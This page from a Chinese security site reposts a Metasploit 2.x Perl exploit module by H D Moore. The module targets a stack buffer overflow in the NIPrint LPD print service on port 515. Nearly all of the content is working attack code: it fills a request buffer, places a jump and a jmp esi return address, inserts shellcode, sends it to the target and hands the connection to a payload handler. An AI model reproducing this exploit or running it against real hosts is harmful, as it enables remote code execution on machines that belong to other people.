首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NIPrint LPD Request Overflow
来源:hdm [at] metasploit.com 作者:H D Moore 发布时间:2006-06-27  

package Msf::Exploit::niprint_lpd;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'NIPrint LPD Request Overflow',
'Version' => '$Revision: 3715 $',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com>',
],

'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,

'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The LPD server port', 515],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the
Network Instrument NIPrint LPD service. Inspired by
Immunity's VisualSploit :-)

}),

'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00",
'Keys' => ['+ws2ord'],
},

'Refs' =>
[
['OSVDB', '2774'],
['BID', '8968'],
['URL', 'http://www.immunitysec.com/documentation/vs_niprint.html'],
],

'DefaultTarget' => 0,

'Targets' =>
[
['NIPrint3.EXE (TDS:0x3a045ff2)', 0x00404236], # jmp esi
],

'Keys' => ['lpd'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $req = Pex::Text::AlphaNumText(8192);
substr($req, 0, 2, "\xeb\x33");
substr($req, 49, 4, pack('V', $target->[1]));
substr($req, 53, length($shellcode), $shellcode);

$s->Send($req);
$self->Handler($s);
$s->Close;
return;
}

1;



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DreamAccount <= 3.1 (auth.a
·Cesar FTP 0.99g MKD Command Bu
·DeluxeBB <= 1.07 (cp.php) C
·Microsoft RRAS MSO6-025 Stack
·MyBulletinBoard (MyBB) <= 1
·Scout Portal Toolkit <= 1.4
·XM Easy Personal FTP Server 5.
·Microsoft Excel 2003 Hlink Sta
·BitchX <= 1.1-final do_hook
·BLOG:CMS <= 4.0.0k Remote S
·Jaws <= 0.6.2 (Search gadge
·Mac OS X <= 10.4.6 (launchd
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved